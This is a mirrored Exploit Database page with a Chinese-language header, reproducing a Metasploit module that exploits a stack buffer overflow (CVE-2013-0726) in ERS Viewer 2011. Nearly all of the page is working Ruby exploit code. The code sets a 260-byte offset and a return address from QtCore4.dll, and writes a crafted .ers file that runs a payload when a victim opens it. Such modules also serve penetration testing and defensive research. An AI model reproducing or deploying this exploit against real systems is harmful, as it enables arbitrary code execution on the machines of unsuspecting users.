ERS Viewer 2011 – ‘.ERS’ File Handling Buffer Overflow (Metasploit)

• Exploit Database
• 37 阅读

• 作者： Metasploit
  日期： 2013-05-14
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/25448/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::FILEFORMAT
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "ERS Viewer 2011 ERS File Handling Buffer Overflow",
  'Description'=> %q{
  This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
  (version 11.04). The vulnerability exists in the module ermapper_u.dll where the
  function ERM_convert_to_correct_webpath handles user provided data in a insecure
  way. It results in arbitrary code execution under the context of the user viewing
  a specially crafted .ers file. This module has been tested successfully with ERS
  Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Parvez Anwar', # Vulnerability Discovery
  'juan vazquez' # Metasploit
  ],
  'References' =>
  [
  [ 'CVE', '2013-0726' ],
  [ 'OSVDB', '92694' ],
  [ 'BID', '59379' ],
  [ 'URL', 'http://secunia.com/advisories/51725/' ]
  ],
  'Payload'=>
  {
  'Space'=> 7516,
  'BadChars' => "\x22\x5c" +
  (0x7f..0xff).to_a.pack("C*") +
  (0x00..0x08).to_a.pack("C*") +
  (0x0a..0x1f).to_a.pack("C*"),
  'DisableNops' => true,
  'EncoderOptions' =>
  {
  'BufferRegister' => 'ESP'
  }
  },
  'SaveRegisters'=> [ 'ESP' ],
  'DefaultOptions'=>
  {
  'ExitFunction' => "process",
  },
  'Platform' => 'win',
  'Targets'=>
  [
  [ 'ERS Viewer 2011 (v11.04)/ Windows XP SP3 / Windows 7 SP1',
  {
  'Offset' => 260,
  'Ret' => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
  }
  ],
  ],
  'Privileged' => false,
  'DisclosureDate' => "Apr 23 2013",
  'DefaultTarget'=> 0))
  
  register_options(
  [
  OptString.new('FILENAME', [ true, 'The file name.','msf.ers']),
  ], self.class)
  
  end
  
  # Rewrote it because make_nops is ignoring SaveRegisters
  # and corrupting ESP.
  def make_nops(count)
  return "\x43" * count # 0x43 => inc ebx
  end
  
  def exploit
  
  buf = rand_text(target['Offset'])
  buf << [target.ret].pack("V")
  buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode
  buf << payload.encoded
  
  ers = %Q|
  DatasetHeader Begin
  Name= "#{buf}"
  DatasetHeader End
  |
  
  file_create(ers)
  end
  end